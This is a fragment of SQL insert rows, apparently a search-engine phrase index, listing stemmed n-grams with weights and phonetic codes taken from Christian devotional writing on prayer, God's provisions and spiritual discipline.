(300670, 'provisions of god', 'provis of god', 0, 1, 1.5667, 'P61252123', 1, '*'),
(300671, 'put because', 'put because', 0, 1, 1.3667, 'P312', 1, '*'),
(300672, 'put because all', 'put because all', 0, 1, 1.5, 'P3124', 1, '*'),
(300673, 'receive our', 'receiv our', 0, 1, 1.3667, 'R216', 1, '*'),
(300674, 'receive our needs', 'receiv our needs', 0, 1, 1.5667, 'R216532', 1, '*'),
(300675, 'receive the product', 'receiv the product', 0, 1, 1.6333, 'R21316323', 1, '*'),
(300676, 'received by', 'receiv by', 0, 1, 1.3667, 'R2131', 1, '*'),
(300677, 'received by faith', 'receiv by faith', 0, 1, 1.5667, 'R21313', 1, '*'),
(300678, 'required and', 'requir and', 0, 1, 1.4, 'R26353', 1, '*'),
(300679, 'required and 3', 'requir and 3', 0, 1, 1.4667, 'R26353', 1, '*'),
(300680, 'result and', 'result and', 0, 1, 1.3333, 'R24353', 1, '*'),
(300681, 'result and i', 'result and i', 0, 1, 1.4, 'R24353', 1, '*'),
(300682, 'result from', 'result from', 0, 1, 1.3667, 'R243165', 1, '*'),
(300683, 'result from god', 'result from god', 0, 1, 1.5, 'R24316523', 1, '*'),
(300684, 'result when', 'result when', 0, 1, 1.3667, 'R2435', 1, '*'),
(300685, 'result when working', 'result when working', 0, 1, 1.6333, 'R24356252', 1, '*'),
(300686, 'right order', 'right order', 0, 1, 1.3667, 'R23636', 1, '*'),
(300687, 'right order as', 'right order as', 0, 1, 1.4667, 'R236362', 1, '*'),
(300688, 'seed form', 'seed form', 0, 1, 1.3, 'S3165', 1, '*'),
(300689, 'seed form but', 'seed form but', 0, 1, 1.4333, 'S316513', 1, '*'),
(300690, 'seed from', 'seed from', 0, 1, 1.3, 'S3165', 1, '*'),
(300691, 'seed from god\'s', 'seed from god', 0, 1, 1.5, 'S3165232', 1, '*'),
(300692, 'seed from the', 'seed from the', 0, 1, 1.4333, 'S31653', 1, '*'),
(300693, 'should not expect', 'should not expect', 0, 1, 1.5667, 'S43532123', 1, '*'),
(300694, 'some christians', 'some christians', 0, 1, 1.5, 'S5262352', 1, '*'),
(300695, 'some christians are', 'some christians are', 0, 1, 1.6333, 'S52623526', 1, '*'),
(300696, 'source phi', 'sourc phi', 0, 1, 1.3333, 'S621', 1, '*'),
(300697, 'source phi 4', 'sourc phi 4', 0, 1, 1.4, 'S621', 1, '*'),
(300698, 'spirit 2', 'spirit 2', 0, 1, 1.2667, 'S163', 1, '*'),
(300699, 'spirit 2 walk', 'spirit 2 walk', 0, 1, 1.4333, 'S16342', 1, '*'),
(300700, 'start the', 'start the', 0, 1, 1.3, 'S363', 1, '*'),
(300701, 'start the process', 'start the process', 0, 1, 1.5667, 'S363162', 1, '*'),
(300702, 'statements', 'statement', 0, 0, 0.6667, 'S3532', 1, '*'),
(300703, 'statements you', 'statement you', 0, 1, 1.4667, 'S3532', 1, '*'),
(300704, 'statements you make', 'statement you make', 0, 1, 1.6333, 'S353252', 1, '*'),
(300705, 'stay put', 'stai put', 0, 1, 1.2667, 'S313', 1, '*'),
(300706, 'stay put because', 'stai put because', 0, 1, 1.5333, 'S31312', 1, '*'),
(300707, 'steps in', 'step in', 0, 1, 1.2667, 'S3125', 1, '*'),
(300708, 'steps in the', 'step in the', 0, 1, 1.4, 'S31253', 1, '*'),
(300709, 'steps involved', 'step involved', 0, 1, 1.4667, 'S31251413', 1, '*'),
(300710, 'steps involved in', 'step involved in', 0, 1, 1.5667, 'S312514135', 1, '*'),
(300711, 'suffering', 'suffer', 0, 0, 0.6, 'S1652', 2, '*'),
(300712, 'suffering today', 'suffer today', 0, 1, 1.5, 'S16523', 1, '*'),
(300713, 'suffering today not', 'suffer today not', 0, 1, 1.6333, 'S1652353', 1, '*'),
(300714, 'supernatural living', 'supernatur living', 0, 1, 1.6333, 'S165364152', 1, '*'),
(300715, 'supernatural living everyone', 'supernatur living everyone', 0, 1, 1.9333, 'S165364152165', 1, '*'),
(300716, 'supernatural living is', 'supernatur living is', 0, 1, 1.7333, 'S165364152', 1, '*'),
(300717, 'surely come', 'sure come', 0, 1, 1.3667, 'S6425', 1, '*'),
(300718, 'surely come it', 'sure come it', 0, 1, 1.4667, 'S64253', 1, '*'),
(300719, 'tarry', 'tarri', 0, 0, 0.3333, 'T600', 1, '*'),
(300720, 'tarry hab', 'tarri hab', 0, 1, 1.3, 'T610', 1, '*'),
(300721, 'tarry hab 2', 'tarri hab 2', 0, 1, 1.3667, 'T610', 1, '*'),
(300722, 'that we receive', 'that we receive', 0, 1, 1.5, 'T621', 1, '*'),
(300723, 'the assistance', 'the assistance', 0, 1, 1.4667, 'T2352', 1, '*'),
(300724, 'the assistance of', 'the assistance of', 0, 1, 1.5667, 'T23521', 1, '*'),
(300725, 'the earth knows', 'the earth knows', 0, 1, 1.5, 'T63252', 1, '*'),
(300726, 'the failure', 'the failure', 0, 1, 1.3667, 'T146', 1, '*'),
(300727, 'the failure of', 'the failure of', 0, 1, 1.4667, 'T1461', 1, '*'),
(300728, 'the familiar', 'the familiar', 0, 1, 1.4, 'T1546', 1, '*'),
(300729, 'the first three', 'the first three', 0, 1, 1.5, 'T16236', 1, '*'),
(300730, 'the forces', 'the forces', 0, 1, 1.3333, 'T162', 1, '*'),
(300731, 'the forces at', 'the forces at', 0, 1, 1.4333, 'T1623', 1, '*'),
(300732, 'the lord through', 'the lord through', 0, 1, 1.5333, 'T46362', 1, '*'),
(300733, 'the means', 'the means', 0, 1, 1.3, 'T520', 1, '*'),
(300734, 'the means god', 'the means god', 0, 1, 1.4333, 'T523', 1, '*'),
(300735, 'the only unfailing', 'the only unfailing', 0, 1, 1.6, 'T5451452', 1, '*'),
(300736, 'the order', 'the order', 0, 1, 1.3, 'T636', 1, '*'),
(300737, 'the order note', 'the order note', 0, 1, 1.4667, 'T63653', 1, '*'),
(300738, 'the process', 'the process', 0, 1, 1.3667, 'T162', 1, '*'),
(300739, 'the process in', 'the process in', 0, 1, 1.4667, 'T1625', 1, '*'),
(300740, 'the process required', 'the process required', 0, 1, 1.6667, 'T1626263', 1, '*'),
(300741, 'the process stay', 'the process stay', 0, 1, 1.5333, 'T1623', 1, '*'),
(300742, 'the product', 'the product', 0, 1, 1.3667, 'T16323', 1, '*'),
(300743, 'the product 2', 'the product 2', 0, 1, 1.4333, 'T16323', 1, '*'),
(300744, 'the product in', 'the product in', 0, 1, 1.4667, 'T163235', 1, '*'),
(300745, 'the product you', 'the product you', 0, 1, 1.5, 'T16323', 1, '*'),
(300746, 'the promise prophecy', 'the promise prophecy', 0, 1, 1.6667, 'T16521612', 1, '*'),
(300747, 'the promise the', 'the promise the', 0, 1, 1.5, 'T16523', 1, '*'),
(300748, 'the provisions', 'the provisions', 0, 1, 1.4667, 'T161252', 1, '*'),
(300749, 'the provisions of', 'the provisions of', 0, 1, 1.5667, 'T1612521', 1, '*'),
(300750, 'the right order', 'the right order', 0, 1, 1.5, 'T623636', 1, '*'),
(300751, 'the seed', 'the seed', 0, 1, 1.2667, 'T230', 1, '*'),
(300752, 'the seed from', 'the seed from', 0, 1, 1.4333, 'T23165', 1, '*'),
(300753, 'the steps involved', 'the steps involved', 0, 1, 1.6, 'T231251413', 1, '*'),
(300754, 'the violation', 'the violation', 0, 1, 1.4333, 'T1435', 1, '*'),
(300755, 'the violation of', 'the violation of', 0, 1, 1.5333, 'T14351', 1, '*'),
(300756, 'their needs', 'their needs', 0, 1, 1.3667, 'T6532', 1, '*'),
(300757, 'their needs but', 'their needs but', 0, 1, 1.5, 'T653213', 1, '*'),
(300758, 'their needs met', 'their needs met', 0, 1, 1.5, 'T653253', 1, '*'),
(300759, 'these steps', 'these steps', 0, 1, 1.3667, 'T2312', 1, '*'),
(300760, 'these steps in', 'these steps in', 0, 1, 1.4667, 'T23125', 1, '*'),
(300761, 'they get', 'thei get', 0, 1, 1.2667, 'T230', 1, '*'),
(300762, 'they get their', 'thei get their', 0, 1, 1.4667, 'T236', 1, '*'),
(300763, 'three statements', 'three statements', 0, 1, 1.5333, 'T623532', 1, '*'),
(300764, 'three statements you', 'three statements you', 0, 1, 1.6667, 'T623532', 1, '*'),
(300765, 'through a process', 'through a process', 0, 1, 1.5667, 'T62162', 1, '*'),
(300766, 'through a promise', 'through a promise', 0, 1, 1.5667, 'T621652', 1, '*'),
(300767, 'through the holy', 'through the holy', 0, 1, 1.5333, 'T6234', 1, '*'),
(300768, 'tim 1 18', 'tim 1 18', 0, 1, 1.2667, 'T500', 1, '*'),
(300769, 'to enlist', 'to enlist', 0, 1, 1.3, 'T5423', 1, '*'),
(300770, 'to enlist all', 'to enlist all', 0, 1, 1.4333, 'T54234', 1, '*'),
(300771, 'to follow these', 'to follow these', 0, 1, 1.5, 'T1432', 1, '*'),
(300772, 'to get obtain', 'to get obtain', 0, 1, 1.4333, 'T23135', 1, '*'),
(300773, 'to get their', 'to get their', 0, 1, 1.4, 'T236', 1, '*'),
(300774, 'to learn the', 'to learn the', 0, 1, 1.4, 'T4653', 1, '*'),
(300775, 'to obtain the', 'to obtain the', 0, 1, 1.4333, 'T1353', 1, '*'),
(300776, 'to start the', 'to start the', 0, 1, 1.4, 'T2363', 1, '*'),
(300777, 'to the violation', 'to the violation', 0, 1, 1.5333, 'T1435', 1, '*'),
(300778, 'today not', 'todai not', 0, 1, 1.3, 'T530', 1, '*'),
(300779, 'today not because', 'todai not because', 0, 1, 1.5667, 'T5312', 1, '*'),
(300780, 'unfailing', 'unfail', 0, 0, 0.6, 'U51452', 1, '*'),
(300781, 'unfailing source', 'unfail source', 0, 1, 1.5333, 'U5145262', 1, '*'),
(300782, 'unfailing source phi', 'unfail source phi', 0, 1, 1.6667, 'U51452621', 1, '*'),
(300783, 'violation', 'violat', 0, 0, 0.6, 'V435', 1, '*'),
(300784, 'violation of', 'violat of', 0, 1, 1.4, 'V4351', 1, '*'),
(300785, 'violation of the', 'violat of the', 0, 1, 1.5333, 'V43513', 1, '*'),
(300786, 'walk the', 'walk the', 0, 1, 1.2667, 'W423', 1, '*'),
(300787, 'walk the process', 'walk the process', 0, 1, 1.5333, 'W423162', 1, '*'),
(300788, 'we receive', 'we receive', 0, 1, 1.3333, 'W621', 1, '*'),
(300789, 'we receive our', 'we receive our', 0, 1, 1.4667, 'W6216', 1, '*'),
(300790, 'what can only', 'what can only', 0, 1, 1.4333, 'W3254', 1, '*'),
(300791, 'when working', 'when working', 0, 1, 1.4, 'W56252', 1, '*'),
(300792, 'when working the', 'when working the', 0, 1, 1.5333, 'W562523', 1, '*'),
(300793, 'where you operate', 'where you operate', 0, 1, 1.5667, 'W6163', 1, '*'),
(300794, 'whether conception', 'whether conception', 0, 1, 1.6, 'W36252135', 1, '*'),
(300795, 'whether conception happens', 'whether conception happens', 0, 1, 1.8667, 'W36252135152', 1, '*'),
(300796, 'will determine whether', 'will determine whether', 0, 1, 1.7333, 'W436536', 1, '*'),
(300797, 'will not tarry', 'will not tarry', 0, 1, 1.4667, 'W4536', 1, '*'),
(300798, 'will surely come', 'will surely come', 0, 1, 1.5333, 'W426425', 1, '*'),
(300799, 'win with promise', 'win with promise', 0, 1, 1.5333, 'W531652', 1, '*'),
(300800, 'wisdom for', 'wisdom for', 0, 1, 1.3333, 'W23516', 1, '*'),
(300801, 'wisdom for you', 'wisdom for you', 0, 1, 1.4667, 'W23516', 1, '*'),
(300802, 'with promise', 'with promise', 0, 1, 1.4, 'W31652', 1, '*'),
(300803, 'with promise prophecy', 'with promise prophecy', 0, 1, 1.7, 'W316521612', 1, '*'),
(300804, 'without conception', 'without conception', 0, 1, 1.6, 'W3252135', 1, '*'),
(300805, 'without conception you', 'without conception you', 0, 1, 1.7333, 'W3252135', 1, '*'),
(300806, 'word or', 'word or', 0, 1, 1.2333, 'W636', 1, '*'),
(300807, 'word or your', 'word or your', 0, 1, 1.4, 'W636', 1, '*'),
(300808, 'working the', 'work the', 0, 1, 1.3667, 'W62523', 1, '*'),
(300809, 'working the process', 'work the process', 0, 1, 1.6333, 'W62523162', 1, '*'),
(300810, 'yea and amen', 'yea and amen', 0, 1, 1.4, 'Y535', 1, '*'),
(300811, 'you can\'t get', 'you can get', 0, 1, 1.4333, 'Y25323', 1, '*'),
(300812, 'you can\'t win', 'you can win', 0, 1, 1.4333, 'Y2535', 1, '*'),
(300813, 'you come across', 'you come across', 0, 1, 1.5, 'Y25262', 1, '*'),
(300814, 'you make', 'you make', 0, 1, 1.2667, 'Y520', 3, '*'),
(300815, 'you make will', 'you make will', 0, 1, 1.4333, 'Y524', 1, '*'),
(300816, 'you operate', 'you operate', 0, 1, 1.3667, 'Y163', 1, '*'),
(300817, 'you operate beyond', 'you operate beyond', 0, 1, 1.6, 'Y163153', 1, '*'),
(300818, 'you to enlist', 'you to enlist', 0, 1, 1.4333, 'Y35423', 1, '*'),
(300819, 'you to learn', 'you to learn', 0, 1, 1.4, 'Y3465', 1, '*'),
(300820, 'your desired', 'your desired', 0, 1, 1.4, 'Y63263', 1, '*'),
(300821, 'your desired result', 'your desired result', 0, 1, 1.6333, 'Y632636243', 1, '*'),
(300822, 'your disposal', 'your disposal', 0, 1, 1.4333, 'Y632124', 1, '*'),
(300823, 'your disposal to', 'your disposal to', 0, 1, 1.5333, 'Y6321243', 1, '*'),
(300824, 'your earthly', 'your earthly', 0, 1, 1.4, 'Y634', 1, '*'),
(300825, 'your earthly activities', 'your earthly activities', 0, 1, 1.7667, 'Y63423132', 1, '*'),
(300826, 'your life can', 'your life can', 0, 1, 1.4333, 'Y64125', 1, '*'),
(300827, 'your prophecy enhanced', 'your prophecy enhanced', 0, 1, 1.7333, 'Y61612523', 1, '*'),
(300828, '“...because', '“...becaus', 0, 0, 0.7333, '“120', 1, '*'),
(300829, '“...because it', '“...becaus it', 0, 1, 1.4667, '“123', 1, '*'),
(300830, '“...because it will', '“...becaus it will', 0, 1, 1.6333, '“1234', 1, '*'),
(300844, '41 from', '41 from', 0, 1, 1.2333, 'F650', 1, '*'),
(300845, '41 from our', '41 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(300846, 'item 41', 'item 41', 0, 1, 1.2333, 'I350', 1, '*'),
(300847, 'item 41 from', 'item 41 from', 0, 1, 1.4, 'I35165', 1, '*'),
(300848, 'k2 item 41', 'k2 item 41', 0, 1, 1.3333, 'K350', 1, '*'),
(300851, '48', '48', 0, 0, 0.2, '', 2, '*'),
(300852, '48 from', '48 from', 0, 1, 1.2333, 'F650', 1, '*'),
(300853, '48 from our', '48 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(300854, 'item 48', 'item 48', 0, 1, 1.2333, 'I350', 1, '*'),
(300855, 'item 48 from', 'item 48 from', 0, 1, 1.4, 'I35165', 1, '*'),
(300856, 'k2 item 48', 'k2 item 48', 0, 1, 1.3333, 'K350', 1, '*'),
(300857, 's heart 21', 's heart 21', 0, 1, 1.3333, 'S630', 1, '*'),
(300858, '1 2', '1 2', 0, 1, 1.1, '', 1, '*'),
(300859, '1 2 the', '1 2 the', 0, 1, 1.2333, 'T000', 1, '*'),
(300860, '1 pray', '1 pray', 0, 1, 1.2, 'P600', 1, '*'),
(300861, '1 pray regularly', '1 pray regularly', 0, 1, 1.5333, 'P62464', 1, '*'),
(300862, '10 22 22', '10 22 22', 0, 1, 1.2667, '', 1, '*'),
(300863, '16 04', '16 04', 0, 1, 1.1667, '', 1, '*'),
(300864, '16 04 2017', '16 04 2017', 0, 1, 1.3333, '', 1, '*'),
(300865, '2 let', '2 let', 0, 1, 1.1667, 'L300', 1, '*'),
(300866, '2 let the', '2 let the', 0, 1, 1.3, 'L300', 1, '*'),
(300867, '2 the arm', '2 the arm', 0, 1, 1.3, 'T650', 1, '*'),
(300868, '22 22', '22 22', 0, 1, 1.1667, '', 1, '*'),
(300869, '22 22 the', '22 22 the', 0, 1, 1.3, 'T000', 1, '*'),
(300870, '22 the', '22 the', 0, 1, 1.2, 'T000', 1, '*'),
(300871, '22 the blessing', '22 the blessing', 0, 1, 1.5, 'T14252', 1, '*'),
(300872, '30 1', '30 1', 0, 1, 1.1333, '', 1, '*'),
(300873, '30 1 2', '30 1 2', 0, 1, 1.2, '', 1, '*'),
(300874, '43 from', '43 from', 0, 1, 1.2333, 'F650', 1, '*'),
(300875, '43 from our', '43 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(300876, '7 9', '7 9', 0, 1, 1.1, '', 1, '*'),
(300877, '7 9 9', '7 9 9', 0, 1, 1.1667, '', 1, '*'),
(300878, '9 9 and', '9 9 and', 0, 1, 1.2333, 'A530', 1, '*'),
(300879, '9 and', '9 and', 0, 1, 1.1667, 'A530', 1, '*'),
(300880, '9 and the', '9 and the', 0, 1, 1.3, 'A530', 1, '*'),
(300881, 'a baptism', 'a baptism', 0, 1, 1.3, 'A1325', 1, '*'),
(300882, 'a baptism of', 'a baptism of', 0, 1, 1.4, 'A13251', 1, '*'),
(300883, 'a church don\'t', 'a church don', 0, 1, 1.4667, 'A262353', 1, '*'),
(300884, 'a curse on', 'a curse on', 0, 1, 1.3333, 'A2625', 1, '*'),
(300885, 'a defiled', 'a defiled', 0, 1, 1.3, 'A3143', 1, '*'),
(300886, 'a defiled or', 'a defiled or', 0, 1, 1.4, 'A31436', 1, '*'),
(300887, 'a man\'s soul', 'a man soul', 0, 1, 1.4, 'A524', 1, '*'),
(300888, 'a mastery', 'a mastery', 0, 1, 1.3, 'A5236', 1, '*'),
(300889, 'a mastery of', 'a mastery of', 0, 1, 1.4, 'A52361', 1, '*'),
(300890, 'about personal', 'about personal', 0, 1, 1.4667, 'A1316254', 1, '*'),
(300891, 'about personal worship', 'about personal worship', 0, 1, 1.7333, 'A1316254621', 1, '*'),
(300892, 'activities that', 'activ that', 0, 1, 1.5, 'A231323', 2, '*'),
(300893, 'activities that connect', 'activ that connect', 0, 1, 1.7667, 'A2313232523', 1, '*'),
(300894, 'acts 7', 'act 7', 0, 1, 1.2, 'A232', 1, '*'),
(300895, 'acts 7 9', 'act 7 9', 0, 1, 1.2667, 'A232', 1, '*'),
(300896, 'adds no', 'add no', 0, 1, 1.2333, 'A325', 1, '*'),
(300897, 'adds no sorrow', 'add no sorrow', 0, 1, 1.4667, 'A32526', 1, '*'),
(300898, 'advantage acts', 'advantag acts', 0, 1, 1.4667, 'A3153232', 1, '*'),
(300899, 'advantage acts 7', 'advantag acts 7', 0, 1, 1.5333, 'A3153232', 1, '*'),
(300900, 'against him but', 'against him but', 0, 1, 1.5, 'A2523513', 1, '*'),
(300901, 'against you you', 'against you you', 0, 1, 1.5, 'A2523', 1, '*'),
(300902, 'all were', 'all were', 0, 1, 1.2667, 'A460', 1, '*'),
(300903, 'all were against', 'all were against', 0, 1, 1.5333, 'A462523', 1, '*'),
(300904, 'alone that', 'alon that', 0, 1, 1.3333, 'A453', 1, '*'),
(300905, 'alone that man', 'alon that man', 0, 1, 1.4667, 'A4535', 1, '*'),
(300906, 'and a mastery', 'and a mastery', 0, 1, 1.4333, 'A535236', 1, '*'),
(300907, 'and deliberate', 'and deliberate', 0, 1, 1.4667, 'A534163', 1, '*'),
(300908, 'and destiny with', 'and destiny with', 0, 1, 1.5333, 'A532353', 1, '*'),
(300909, 'and discipline', 'and discipline', 0, 1, 1.4667, 'A532145', 1, '*'),
(300910, 'and discipline yield', 'and discipline yield', 0, 1, 1.6667, 'A53214543', 1, '*'),
(300911, 'and draw', 'and draw', 0, 1, 1.2667, 'A536', 1, '*'),
(300912, 'and draw near', 'and draw near', 0, 1, 1.4333, 'A53656', 1, '*'),
(300913, 'and flee', 'and flee', 0, 1, 1.2667, 'A5314', 1, '*'),
(300914, 'and flee anything', 'and flee anything', 0, 1, 1.5667, 'A53145352', 1, '*'),
(300915, 'and he adds', 'and he adds', 0, 1, 1.3667, 'A532', 1, '*'),
(300916, 'and his word', 'and his word', 0, 1, 1.4, 'A53263', 1, '*'),
(300917, 'and intimacy', 'and intimacy', 0, 1, 1.4, 'A535352', 1, '*'),
(300918, 'and intimacy with', 'and intimacy with', 0, 1, 1.5667, 'A5353523', 1, '*'),
(300919, 'and living', 'and living', 0, 1, 1.3333, 'A534152', 1, '*'),
(300920, 'and living in', 'and living in', 0, 1, 1.4333, 'A5341525', 1, '*'),
(300921, 'and rebellion', 'and rebellion', 0, 1, 1.4333, 'A536145', 1, '*'),
(300922, 'and rebellion brings', 'and rebellion brings', 0, 1, 1.6667, 'A5361451652', 1, '*'),
(300923, 'and strong for', 'and strong for', 0, 1, 1.4667, 'A532365216', 1, '*'),
(300924, 'and the patriarchs', 'and the patriarchs', 0, 1, 1.6, 'A531362', 1, '*'),
(300925, 'and then brings', 'and then brings', 0, 1, 1.5, 'A5351652', 1, '*'),
(300926, 'and work', 'and work', 0, 1, 1.2667, 'A5362', 1, '*'),
(300927, 'and work those', 'and work those', 0, 1, 1.4667, 'A536232', 1, '*'),
(300928, 'any hatred', 'ani hatred', 0, 1, 1.3333, 'A5363', 1, '*'),
(300929, 'any hatred of', 'ani hatred of', 0, 1, 1.4333, 'A53631', 1, '*'),
(300930, 'anything man', 'anyth man', 0, 1, 1.4, 'A53525', 1, '*'),
(300931, 'anything man does', 'anyth man does', 0, 1, 1.5667, 'A5352532', 1, '*'),
(300932, 'anything that can', 'anyth that can', 0, 1, 1.5667, 'A5352325', 1, '*'),
(300933, 'arm of', 'arm of', 0, 1, 1.2, 'A651', 1, '*'),
(300934, 'arm of flesh', 'arm of flesh', 0, 1, 1.4, 'A65142', 1, '*'),
(300935, 'around a', 'around a', 0, 1, 1.2667, 'A653', 1, '*'),
(300936, 'around a man\'s', 'around a man', 0, 1, 1.4667, 'A65352', 1, '*'),
(300937, 'around your', 'around your', 0, 1, 1.3667, 'A6536', 1, '*'),
(300938, 'around your soul', 'around your soul', 0, 1, 1.5333, 'A653624', 1, '*'),
(300939, 'as he corrects', 'as he corrects', 0, 1, 1.4667, 'A26232', 1, '*'),
(300940, 'as you do', 'as you do', 0, 1, 1.3, 'A230', 1, '*'),
(300941, 'ask “is', 'ask “is', 0, 1, 1.2333, 'A200', 1, '*'),
(300942, 'ask “is god', 'ask “is god', 0, 1, 1.3667, 'A230', 1, '*'),
(300943, 'at what people', 'at what people', 0, 1, 1.4667, 'A314', 1, '*'),
(300944, 'available intimacy', 'avail intimacy', 0, 1, 1.6, 'A14145352', 1, '*'),
(300945, 'available intimacy is', 'avail intimacy is', 0, 1, 1.7, 'A14145352', 1, '*'),
(300946, 'baptism of', 'baptism of', 0, 1, 1.3333, 'B3251', 1, '*'),
(300947, 'baptism of discerning', 'baptism of discerning', 0, 1, 1.7, 'B325132652', 1, '*'),
(300948, 'battle the', 'battl the', 0, 1, 1.3333, 'B343', 1, '*'),
(300949, 'battle the presence', 'battl the presence', 0, 1, 1.6333, 'B34316252', 1, '*'),
(300950, 'be cold', 'be cold', 0, 1, 1.2333, 'B243', 1, '*'),
(300951, 'be cold pray', 'be cold pray', 0, 1, 1.4, 'B24316', 1, '*'),
(300952, 'be deliberate', 'be deliberate', 0, 1, 1.4333, 'B34163', 1, '*'),
(300953, 'be deliberate about', 'be deliberate about', 0, 1, 1.6333, 'B3416313', 1, '*'),
(300954, 'be with you', 'be with you', 0, 1, 1.3667, 'B300', 1, '*'),
(300955, 'becoming envious', 'becom envious', 0, 1, 1.5333, 'B252512', 1, '*'),
(300956, 'becoming envious sold', 'becom envious sold', 0, 1, 1.7, 'B25251243', 1, '*'),
(300957, 'believer in', 'believ in', 0, 1, 1.3667, 'B4165', 1, '*'),
(300958, 'believer in life', 'believ in life', 0, 1, 1.5333, 'B416541', 1, '*'),
(300959, 'beloved let', 'belov let', 0, 1, 1.3667, 'B41343', 1, '*'),
(300960, 'beloved let god', 'belov let god', 0, 1, 1.5, 'B4134323', 1, '*'),
(300961, 'blessing of', 'bless of', 0, 1, 1.3667, 'B42521', 1, '*'),
(300962, 'blessing of the', 'bless of the', 0, 1, 1.5, 'B425213', 1, '*'),
(300963, 'bring cloudiness', 'bring cloudiness', 0, 1, 1.5333, 'B6524352', 1, '*'),
(300964, 'bring cloudiness around', 'bring cloudiness around', 0, 1, 1.7667, 'B6524352653', 1, '*'),
(300965, 'brings cloudiness', 'bring cloudiness', 0, 1, 1.5667, 'B6524352', 1, '*'),
(300966, 'brings cloudiness around', 'bring cloudiness around', 0, 1, 1.8, 'B6524352653', 1, '*'),
(300967, 'brings light', 'bring light', 0, 1, 1.4, 'B652423', 1, '*'),
(300968, 'brings light to', 'bring light to', 0, 1, 1.5, 'B652423', 1, '*'),
(300969, 'busy', 'busi', 0, 0, 0.2667, 'B200', 2, '*'),
(300970, 'busy you', 'busi you', 0, 1, 1.2667, 'B200', 1, '*'),
(300971, 'busy you get', 'busi you get', 0, 1, 1.4, 'B230', 1, '*'),
(300972, 'but ask', 'but ask', 0, 1, 1.2333, 'B320', 1, '*'),
(300973, 'but ask “is', 'but ask “is', 0, 1, 1.3667, 'B320', 1, '*'),
(300974, 'but consider', 'but consider', 0, 1, 1.4, 'B325236', 1, '*'),
(300975, 'but consider who', 'but consider who', 0, 1, 1.5333, 'B325236', 1, '*'),
(300976, 'but one', 'but one', 0, 1, 1.2333, 'B350', 1, '*'),
(300977, 'but one with', 'but one with', 0, 1, 1.4, 'B353', 1, '*'),
(300978, 'by hard', 'by hard', 0, 1, 1.2333, 'B630', 1, '*'),
(300979, 'by hard work', 'by hard work', 0, 1, 1.4, 'B6362', 1, '*'),
(300980, 'can bring cloudiness', 'can bring cloudiness', 0, 1, 1.6667, 'C516524352', 1, '*'),
(300981, 'can do it', 'can do it', 0, 1, 1.3, 'C530', 1, '*'),
(300982, 'can make it', 'can make it', 0, 1, 1.3667, 'C523', 1, '*'),
(300983, 'can\'t last', 'can last', 0, 1, 1.3333, 'C53423', 1, '*'),
(300984, 'can\'t last with', 'can last with', 0, 1, 1.5, 'C53423', 1, '*'),
(300985, 'candle', 'candl', 0, 0, 0.4, 'C534', 1, '*'),
(300986, 'candle never', 'candl never', 0, 1, 1.4, 'C534516', 1, '*'),
(300987, 'candle never joke', 'candl never joke', 0, 1, 1.5667, 'C5345162', 1, '*'),
(300988, 'cathedral', 'cathedr', 0, 0, 0.6, 'C364', 1, '*'),
(300989, 'cathedral but', 'cathedr but', 0, 1, 1.4333, 'C36413', 1, '*'),
(300990, 'cathedral but ask', 'cathedr but ask', 0, 1, 1.5667, 'C364132', 1, '*'),
(300991, 'church don\'t', 'church don', 0, 1, 1.4, 'C62353', 1, '*'),
(300992, 'church don\'t consider', 'church don consider', 0, 1, 1.7, 'C6235325236', 1, '*'),
(300993, 'closer to you', 'closer to you', 0, 1, 1.4333, 'C4263', 1, '*'),
(300994, 'cloudiness', 'cloudi', 0, 0, 0.6667, 'C4352', 1, '*'),
(300995, 'cloudiness around', 'cloudi around', 0, 1, 1.5667, 'C4352653', 1, '*'),
(300996, 'cloudiness around a', 'cloudi around a', 0, 1, 1.6333, 'C4352653', 1, '*'),
(300997, 'cloudiness around your', 'cloudi around your', 0, 1, 1.7333, 'C43526536', 1, '*'),
(300998, 'cold pray', 'cold pray', 0, 1, 1.3, 'C4316', 1, '*'),
(300999, 'cold pray in', 'cold pray in', 0, 1, 1.4, 'C43165', 1, '*'),
(301000, 'come to a', 'come to a', 0, 1, 1.3, 'C530', 1, '*'),
(301001, 'comes first', 'come first', 0, 1, 1.3667, 'C521623', 1, '*'),
(301002, 'comes first to', 'come first to', 0, 1, 1.4667, 'C521623', 1, '*'),
(301003, 'coming from', 'come from', 0, 1, 1.3667, 'C52165', 1, '*'),
(301004, 'coming from god', 'come from god', 0, 1, 1.5, 'C5216523', 1, '*'),
(301005, 'communications', 'commun', 0, 0, 0.9333, 'C52352', 2, '*'),
(301006, 'communications or', 'commun or', 0, 1, 1.5667, 'C523526', 1, '*'),
(301007, 'communications or divine', 'commun or divine', 0, 1, 1.8, 'C523526315', 1, '*'),
(301008, 'consider the fantastic', 'consid the fantastic', 0, 1, 1.7333, 'C52363153232', 1, '*'),
(301009, 'consider who', 'consid who', 0, 1, 1.4, 'C5236', 1, '*'),
(301010, 'consider who is', 'consid who is', 0, 1, 1.5, 'C52362', 1, '*'),
(301011, 'correct your', 'correct your', 0, 1, 1.4, 'C6236', 1, '*'),
(301012, 'correct your wrong', 'correct your wrong', 0, 1, 1.6, 'C623652', 1, '*'),
(301013, 'correction', 'correct', 0, 0, 0.6667, 'C6235', 1, '*'),
(301014, 'correction and', 'correct and', 0, 1, 1.4667, 'C62353', 1, '*'),
(301015, 'correction and discipline', 'correct and discipline', 0, 1, 1.8333, 'C623532145', 1, '*'),
(301016, 'corrects you the', 'correct you the', 0, 1, 1.5333, 'C62323', 1, '*'),
(301017, 'cultivate', 'cultiv', 0, 0, 0.6, 'C4313', 1, '*'),
(301018, 'cultivate intimacy', 'cultiv intimacy', 0, 1, 1.6, 'C43135352', 1, '*'),
(301019, 'cultivate intimacy with', 'cultiv intimacy with', 0, 1, 1.7667, 'C431353523', 1, '*'),
(301020, 'curse on', 'curs on', 0, 1, 1.2667, 'C625', 1, '*'),
(301021, 'curse on a', 'curs on a', 0, 1, 1.3333, 'C625', 1, '*'),
(301022, 'dearly beloved let', 'dearli beloved let', 0, 1, 1.6, 'D64141343', 1, '*'),
(301023, 'defiled or', 'defil or', 0, 1, 1.3333, 'D1436', 1, '*'),
(301024, 'defiled or rebellious', 'defil or rebellious', 0, 1, 1.7, 'D1436142', 1, '*'),
(301025, 'deliberate', 'deliber', 0, 0, 0.6667, 'D4163', 2, '*'),
(301026, 'deliberate about', 'deliber about', 0, 1, 1.5333, 'D416313', 1, '*'),
(301027, 'deliberate about personal', 'deliber about personal', 0, 1, 1.8333, 'D41631316254', 1, '*'),
